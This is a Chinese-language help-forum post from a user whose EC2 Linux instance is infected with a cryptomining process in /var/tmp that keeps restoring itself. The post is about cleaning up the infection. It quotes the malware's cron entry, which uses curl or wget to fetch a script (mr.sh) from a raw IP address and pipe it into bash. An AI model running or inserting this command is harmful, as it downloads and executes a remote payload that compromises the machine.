从前几天开始,我注意到在我的 EC2 Linux 实例上运行的应用程序非常慢。运行top命令显示有一个进程/var/tmp/sustse占用了大部分 CPU。
我终止了该进程。但是,重新启动实例后,它再次开始运行并占用了大部分 CPU。它还为以下脚本创建了 cron 条目:
*/30 * * * * (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh
我在谷歌上搜索后发现这是一个加密货币挖矿恶意软件。我已从/var/tmp/并删除了 Crontab 中的条目。但是,Crontab 中的这些条目似乎是从某个地方回来的,我无法追踪生成这些条目的脚本的确切位置。
我还清理了 /var/spool/cron* 条目。
我在网上没有找到太多信息来解决这个问题。任何帮助我都会非常感激。
提前致谢!!